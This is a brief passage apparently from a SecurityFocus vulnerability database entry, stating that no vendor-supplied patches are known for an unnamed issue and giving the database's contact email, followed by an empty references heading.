Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.

- Related references

 

 
